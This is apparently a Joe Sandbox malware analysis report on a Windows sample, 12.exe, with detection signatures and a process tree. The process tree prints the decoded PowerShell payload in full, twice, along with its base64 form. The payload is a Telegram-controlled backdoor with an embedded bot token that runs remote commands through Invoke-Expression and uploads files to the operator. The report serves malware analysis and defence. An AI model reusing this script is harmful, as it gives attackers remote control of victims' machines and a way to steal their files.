Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
12.exe

Overview

General Information

Sample name:12.exe
Analysis ID:1590581
MD5:90f2ca0a38d6e5416ee2f6be6326521d
SHA1:00bf14e8153778835f95b9255ae1658e37819f8d
SHA256:6534d5fd803f9c85bec3a820cef54f953e8643f3a4e16677d11decbf1a5b54c7
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious encrypted Powershell command line found
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Encrypted powershell cmdline option found
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious PowerShell Encoded Command Patterns
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Uses the Telegram API (likely for C&C communication)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected non-DNS traffic on DNS port
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Execution of Powershell with Base64
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

  • System is w10x64
  • 12.exe (PID: 1892 cmdline: "C:\Users\user\Desktop\12.exe" MD5: 90F2CA0A38D6E5416EE2F6BE6326521D)
    • powershell.exe (PID: 6496 cmdline: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e '$ T o k e n   =   " 7 5 5 4 3 0 7 6 6 9 : A A E _ l n Q T Y S X v u s a K l k p N r v 2 D v Y u C 7 H h I 0 s 0 "  
 $ U R L   =   " h t t p s : / / a p i . t e l e g r a m . o r g / b o t { 0 } "   - f   $ T o k e n  
 $ l a s t I D   =   1 2 3  
 $ s l e e p T i m e   =   2  
 $ i d e n t i f i e r   =   - j o i n   ( ( 4 8 . . 5 7 )   |   G e t - R a n d o m   - C o u n t   5   |   %   { [ c h a r ] $ _ } )  
  
 f u n c t i o n   I n v o k e - B o t C m d   {  
         p a r a m   (  
                 $ c o m m a n d  
         )  
         t r y   {  
                 $ r e s u l t   =   I n v o k e - E x p r e s s i o n ( $ c o m m a n d )  
         }  
         c a t c h   {  
                 $ r e s u l t   =   $ E r r o r [ 0 ] . E x c e p t i o n  
         }  
         $ r e s   =   " [ $ i d e n t i f i e r ] % 0 D % 0 A "  
         $ r e s u l t   |   F o r E a c h - O b j e c t   { $ r e s   + =   [ s t r i n g ] $ _   +   " % 0 D % 0 A " }  
  
         i f ( $ r e s   - e q   " " ) {  
                 $ l a s t I D   =   $ u p d a t e i d  
                 c o n t i n u e  
         }  
         i f ( $ r e s . L e n g t h   - g t   4 0 9 5 ) {  
                 f o r   ( $ i   =   0 ;   $ i   - l t   $ r e s . L e n g t h   /   4 0 9 5 ;   $ i + + )   {  
                         $ b e g i n   =   $ i   *   4 0 9 5  
                         $ e n d   =   $ b e g i n   +   4 0 9 4  
                         i f ( $ e n d   - g t   $ r e s . L e n g t h ) {  
                                 $ e n d   =   $ r e s . L e n g t h  
                         }  
                         $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = "   +   $ r e s [ $ b e g i n . . $ e n d ]  
                         $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                         I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
                 }  
         }   e l s e   {  
                 $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = $ r e s "    
                 $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                 I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
         }  
 }  
  
 f u n c t i o n   I n v o k e - B o t D o w n l o a d   {  
         p a r a m   (  
                 $ F i l e P a t h  
         )  
         A d d - t y p e   - A s s e m b l y N a m e   S y s t e m . N e t . H t t p  
         $ F i e l d N a m e   =   ' d o c u m e n t '  
         $ h t t p C l i e n t H a n d l e r   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p C l i e n t H a n d l e r  
         $ h t t p C l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p c l i e n t   $ h t t p C l i e n t H a n d l e r  
  
         $ F i l e S t r e a m   =   [ S y s t e m . I O . F i l e S t r e a m ] : : n e w ( $ F i l e P a t h ,   [ S y s t e m . I O . F i l e M o d e ] : : O p e n )  
         $ F i l e H e a d e r   =   [ S y s t e m . N e t . H t t p . H e a d e r s . C o n t e n t D i s p o s i t i o n H e a d e r V a l u e ] : : n e w ( ' f o r m - d a t a ' )  
         $ F i l e H e a d e r . N a m e   =   $ F i e l d N a m e  
         $ F i l e H e a d e r . F i l e N a m e   =   ( S p l i t - P a t h   $ F i l e P a t h   - l e a f )  
         $ F i l e C o n t e n t   =   [ S y s t e m . N e t . H t t p . S t r e a m C o n t e n t ] : : n e w ( $ F i l e S t r e a m )  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t D i s p o s i t i o n   =   $ F i l e H e a d e r  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t T y p e   =   [ S y s t e m . W e b . M i m e M a p p i n g ] : : G e t M i m e M a p p i n g ( $ F i l e P a t h )    
          
         $ M u l t i p a r t C o n t e n t   =   [ S y s t e m . N e t . H t t p . M u l t i p a r t F o r m D a t a C o n t e n t ] : : n e w ( )  
         $ M u l t i p a r t C o n t e n t . A d d ( $ F i l e C o n t e n t )  
          
         $ h t t p C l i e n t . P o s t A s y n c ( " $ U R L / s e n d D o c u m e n t ? c h a t _ i d = $ f r o m " ,   $ M u l t i p a r t C o n t e n t )   >   $ n u l l  
 }  
  
 w h i l e   ( $ t r u e )   {  
         t r y {  
                 $ i n M e s s a g e   =   I n v o k e - R e s t M e t h o d   - M e t h o d   G e t   - U r i   ( $ U R L   + ' / g e t U p d a t e s ? o f f s e t = '   +   ( $ l a s t I D   +   1 ) )   - E r r o r A c t i o n   S t o p  
         }  
         c a t c h   {  
                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )    
                 c o n t i n u e  
         }  
         $ i n M e s s a g e . r e s u l t   |   F o r E a c h - O b j e c t   {  
                 $ u p d a t e i d   =   $ _ . u p d a t e _ i d  
                 $ f r o m   =   $ _ . m e s s a g e . f r o m . i d  
                 $ c o m m a n d   =   [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ _ . m e s s a g e . t e x t ) )  
  
                 i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   6 )   - e q   " / s l e e p " ) {  
                         $ s l e e p T i m e   =   [ i n t ] $ c o m m a n d . S u b s t r i n g ( 7 )  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   4 )   - e q   " / c m d " ) {  
                         $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 5 )                          
                         I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   9 )   - e q   " / d o w n l o a d " ) {  
                         $ F i l e P a t h   =   $ c o m m a n d . S u b s t r i n g ( 1 0 )          
                         I n v o k e - B o t D o w n l o a d   - F i l e P a t h   $ F i l e P a t h          
                 }  
                 e l s e   {  
                         $ c m d   =   $ c o m m a n d . S u b s t r i n g ( 1 ,   5 )  
                         i f ( $ i d e n t i f i e r   - e q   $ c m d ) {  
                                 $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 7 )  
                                 I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                         }  
                         e l s e   {  
                                 W r i t e - H o s t   " S L E E P "  
                                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )  
                         }  
                 }  
                 $ l a s t I D   =   $ u p d a t e i d                
         }  
         S t a r t - S l e e p   - S e c o n d s   $ s l e e p T i m e  
 } '" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5556 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • Acrobat.exe (PID: 4568 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\file.pdf" MD5: 24EAD1C46A47022347DC0F05F6EFBB8C)
        • AcroCEF.exe (PID: 5988 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
          • AcroCEF.exe (PID: 7248 cmdline: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2116 --field-trial-handle=1724,i,10193653544518332854,3055548416538146672,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8 MD5: 9B38E8E8B6DD9622D24B53E095C5D9BE)
      • powershell.exe (PID: 3552 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e $ T o k e n   =   " 7 5 5 4 3 0 7 6 6 9 : A A E _ l n Q T Y S X v u s a K l k p N r v 2 D v Y u C 7 H h I 0 s 0 "  
 $ U R L   =   " h t t p s : / / a p i . t e l e g r a m . o r g / b o t { 0 } "   - f   $ T o k e n  
 $ l a s t I D   =   1 2 3  
 $ s l e e p T i m e   =   2  
 $ i d e n t i f i e r   =   - j o i n   ( ( 4 8 . . 5 7 )   |   G e t - R a n d o m   - C o u n t   5   |   %   { [ c h a r ] $ _ } )  
  
 f u n c t i o n   I n v o k e - B o t C m d   {  
         p a r a m   (  
                 $ c o m m a n d  
         )  
         t r y   {  
                 $ r e s u l t   =   I n v o k e - E x p r e s s i o n ( $ c o m m a n d )  
         }  
         c a t c h   {  
                 $ r e s u l t   =   $ E r r o r [ 0 ] . E x c e p t i o n  
         }  
         $ r e s   =   " [ $ i d e n t i f i e r ] % 0 D % 0 A "  
         $ r e s u l t   |   F o r E a c h - O b j e c t   { $ r e s   + =   [ s t r i n g ] $ _   +   " % 0 D % 0 A " }  
  
         i f ( $ r e s   - e q   " " ) {  
                 $ l a s t I D   =   $ u p d a t e i d  
                 c o n t i n u e  
         }  
         i f ( $ r e s . L e n g t h   - g t   4 0 9 5 ) {  
                 f o r   ( $ i   =   0 ;   $ i   - l t   $ r e s . L e n g t h   /   4 0 9 5 ;   $ i + + )   {  
                         $ b e g i n   =   $ i   *   4 0 9 5  
                         $ e n d   =   $ b e g i n   +   4 0 9 4  
                         i f ( $ e n d   - g t   $ r e s . L e n g t h ) {  
                                 $ e n d   =   $ r e s . L e n g t h  
                         }  
                         $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = "   +   $ r e s [ $ b e g i n . . $ e n d ]  
                         $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                         I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
                 }  
         }   e l s e   {  
                 $ d a t a   =   " c h a t _ i d = $ f r o m & t e x t = $ r e s "    
                 $ U R I   =   " $ U R L / s e n d M e s s a g e ? $ d a t a "  
                 I n v o k e - W e b R e q u e s t   - U r i   $ U R I   >   $ n u l l  
         }  
 }  
  
 f u n c t i o n   I n v o k e - B o t D o w n l o a d   {  
         p a r a m   (  
                 $ F i l e P a t h  
         )  
         A d d - t y p e   - A s s e m b l y N a m e   S y s t e m . N e t . H t t p  
         $ F i e l d N a m e   =   ' d o c u m e n t '  
         $ h t t p C l i e n t H a n d l e r   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p C l i e n t H a n d l e r  
         $ h t t p C l i e n t   =   N e w - O b j e c t   S y s t e m . N e t . H t t p . H t t p c l i e n t   $ h t t p C l i e n t H a n d l e r  
  
         $ F i l e S t r e a m   =   [ S y s t e m . I O . F i l e S t r e a m ] : : n e w ( $ F i l e P a t h ,   [ S y s t e m . I O . F i l e M o d e ] : : O p e n )  
         $ F i l e H e a d e r   =   [ S y s t e m . N e t . H t t p . H e a d e r s . C o n t e n t D i s p o s i t i o n H e a d e r V a l u e ] : : n e w ( ' f o r m - d a t a ' )  
         $ F i l e H e a d e r . N a m e   =   $ F i e l d N a m e  
         $ F i l e H e a d e r . F i l e N a m e   =   ( S p l i t - P a t h   $ F i l e P a t h   - l e a f )  
         $ F i l e C o n t e n t   =   [ S y s t e m . N e t . H t t p . S t r e a m C o n t e n t ] : : n e w ( $ F i l e S t r e a m )  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t D i s p o s i t i o n   =   $ F i l e H e a d e r  
         $ F i l e C o n t e n t . H e a d e r s . C o n t e n t T y p e   =   [ S y s t e m . W e b . M i m e M a p p i n g ] : : G e t M i m e M a p p i n g ( $ F i l e P a t h )    
          
         $ M u l t i p a r t C o n t e n t   =   [ S y s t e m . N e t . H t t p . M u l t i p a r t F o r m D a t a C o n t e n t ] : : n e w ( )  
         $ M u l t i p a r t C o n t e n t . A d d ( $ F i l e C o n t e n t )  
          
         $ h t t p C l i e n t . P o s t A s y n c ( " $ U R L / s e n d D o c u m e n t ? c h a t _ i d = $ f r o m " ,   $ M u l t i p a r t C o n t e n t )   >   $ n u l l  
 }  
  
 w h i l e   ( $ t r u e )   {  
         t r y {  
                 $ i n M e s s a g e   =   I n v o k e - R e s t M e t h o d   - M e t h o d   G e t   - U r i   ( $ U R L   + ' / g e t U p d a t e s ? o f f s e t = '   +   ( $ l a s t I D   +   1 ) )   - E r r o r A c t i o n   S t o p  
         }  
         c a t c h   {  
                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )    
                 c o n t i n u e  
         }  
         $ i n M e s s a g e . r e s u l t   |   F o r E a c h - O b j e c t   {  
                 $ u p d a t e i d   =   $ _ . u p d a t e _ i d  
                 $ f r o m   =   $ _ . m e s s a g e . f r o m . i d  
                 $ c o m m a n d   =   [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t S t r i n g ( [ S y s t e m . T e x t . E n c o d i n g ] : : U T F 8 . G e t B y t e s ( $ _ . m e s s a g e . t e x t ) )  
  
                 i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   6 )   - e q   " / s l e e p " ) {  
                         $ s l e e p T i m e   =   [ i n t ] $ c o m m a n d . S u b s t r i n g ( 7 )  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   4 )   - e q   " / c m d " ) {  
                         $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 5 )                          
                         I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                 }  
                 e l s e i f ( $ c o m m a n d . S u b s t r i n g ( 0 ,   9 )   - e q   " / d o w n l o a d " ) {  
                         $ F i l e P a t h   =   $ c o m m a n d . S u b s t r i n g ( 1 0 )          
                         I n v o k e - B o t D o w n l o a d   - F i l e P a t h   $ F i l e P a t h          
                 }  
                 e l s e   {  
                         $ c m d   =   $ c o m m a n d . S u b s t r i n g ( 1 ,   5 )  
                         i f ( $ i d e n t i f i e r   - e q   $ c m d ) {  
                                 $ c o m m a n d   =   $ c o m m a n d . S u b s t r i n g ( 7 )  
                                 I n v o k e - B o t C m d   - c o m m a n d   $ c o m m a n d  
                         }  
                         e l s e   {  
                                 W r i t e - H o s t   " S L E E P "  
                                 S t a r t - S l e e p   $ ( G e t - R a n d o m   - M a x i m u m   1 0 )  
                         }  
                 }  
                 $ l a s t I D   =   $ u p d a t e i d                
         }  
         S t a r t - S l e e p   - S e c o n d s   $ s l e e p T i m e  
 }  MD5: 04029E121A0CFA5991749937DD22A1D9)
  • svchost.exe (PID: 6688 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 3552INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
  • 0x10b614:$b3: ::UTF8.GetString(
  • 0x2dc06a:$b3: ::UTF8.GetString(
  • 0x20524:$s1: -join
  • 0x2055f:$s1: -join
  • 0x2061b:$s1: -join
  • 0x20649:$s1: -join
  • 0x20800:$s1: -join
  • 0x20823:$s1: -join
  • 0x20ad8:$s1: -join
  • 0x20af9:$s1: -join
  • 0x20b2b:$s1: -join
  • 0x20b73:$s1: -join
  • 0x20ba0:$s1: -join
  • 0x20bc7:$s1: -join
  • 0x20bf8:$s1: -join
  • 0x20c1a:$s1: -join
  • 0x20c89:$s1: -join
  • 0x21115:$s1: -join
  • 0x21137:$s1: -join
  • 0x2118f:$s1: -join
  • 0x211b9:$s1: -join

System Summary

barindex
Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\/file.pdf'; powershell.exe -e 'JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQ
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABUAG8AawBlAG4AIAA9ACAAIgA3ADUANQA0ADMAMAA3ADYANgA5ADoAQQBBAEUAXwBsAG4AUQBUAFkAUwBYAHYAdQBzAGEASwBsAGsAcABOAHIAdgAyAEQAdgBZAHUAQwA3AEgAaABJADAAcwAwACIADQAKACQAVQBSAEwAIAA9ACAAIgBoAHQAdABwAHMAOgAvAC8AYQBwAGkALgB0AGUAbABlAGcAcgBhAG0ALgBvAHIAZwAvAGIAbwB0AHsAMAB9ACIAIAAtAGYAIAAkAFQAbwBrAGUAbgANAAoAJABsAGEAcwB0AEkARAAgAD0AIAAxADIAMwANAAoAJABzAGwAZQBlAHAAVABpAG0AZQAgAD0AIAAyAA0ACgAkAGkAZABlAG4AdABpAGYAaQBlAHIAIAA9ACAALQBqAG8AaQBuACAAKAAoADQAOAAuAC4ANQA3ACkAIAB8ACAARwBlAHQALQBSAGEAbgBkAG8AbQAgAC0AQwBvAHUAbgB0ACAANQAgAHwAIAAlACAAewBbAGMAaABhAHIAXQAkAF8AfQApAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAASQBuAHYAbwBrAGUALQBCAG8AdABDAG0AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACAAKAANAAoAIAAgACAAIAAgACAAIAAgACQAYwBvAG0AbQBhAG4AZAANAAoAIAAgACAAIAApAA0ACgAgACAAIAAgAHQAcgB5ACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcgBlAHMAdQBsAHQAIAA9ACAASQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACgAJABjAG8AbQBtAGEAbgBkACkADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABjAGEAdABjAGgAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJAByAGUAcwB1AGwAdAAgAD0AIAAkAEUAcgByAG8AcgBbADAAXQAuAEUAeABjAGUAcAB0AGkAbwBuAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAJAByAGUAcwAgAD0AIAAiAFsAJABpAGQAZQBuAHQAaQBmAGkAZQByAF0AJQAwAEQAJQAwAEEAIgANAAoAIAAgACAAIAAkAHIAZQBzAHUAbAB0ACAAfAAgAEYAbwByAEUAYQBjAGgALQBPAGIAagBlAGMAdAAgAHsAJAByAGUAcwAgACsAPQAgAFsAcwB0AHIAaQBuAGcAXQAkAF8AIAArACAAIgAlADAARAAlADAAQQAiAH0ADQAKAA0ACgAgACAAIAAgAGkAZgAoACQAcgBlAHMAIAAtAGUAcQAgACIAIgApAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAYQBzAHQASQBEACAAPQAgACQAdQBwAGQAYQB0AGUAaQBkAA0ACgAgACAAIAAgACAAIAAgACAAYwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACgAJAByAGUAcwAuAEwAZQBuAGcAdABoACAALQBnAHQAIAA0ADAAOQA1ACkAewANAAoAIAAgACAAIAAgACAAIAAgAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHIAZQBzAC4ATABlAG4AZwB0AGgAIAAvACAANAAwADkANQA7ACAAJABpACsAKwApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAGUAZwBpAG4AIAA9ACAAJABpACAAKgAgADQAMAA5ADUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGQAIAA9ACAAJABiAGUAZwBpAG4AIAArACAANAAwADkANAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACgAJABlAG4AZAAgAC0AZwB0ACAAJAByAGUAcwAuAEwAZQBuAGcAdABoACkAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGUAbgBkACAAPQAgACQAcgBlAHMALgBMAGUAbgBnAHQAaAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABkAGEAdABhACAAPQAgACIAYwBoAGEAdABfAGkAZAA9ACQAZgByAG8AbQAmAHQAZQB4AHQAPQAiACAAKwAgACQAcgBlAHMAWwAkAGIAZQBnAGkAbgAuAC4AJABlAG4AZABdAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJABVAFIASQAgAD4AIAAkAG4AdQBsAGwADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0AIABlAGwAcwBlACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAZABhAHQAYQAgAD0AIAAiAGMAaABhAHQAXwBpAGQAPQAkAGYAcgBvAG0AJgB0AGUAeAB0AD0AJAByAGUAcwAiACAADQAKACAAIAAgACAAIAAgACAAIAAkAFUAUgBJACAAPQAgACIAJABVAFIATAAvAHMAZQBuAGQATQBlAHMAcwBhAGcAZQA/ACQAZABhAHQAYQAiAA0ACgAgACAAIAAgACAAIAAgACAASQ
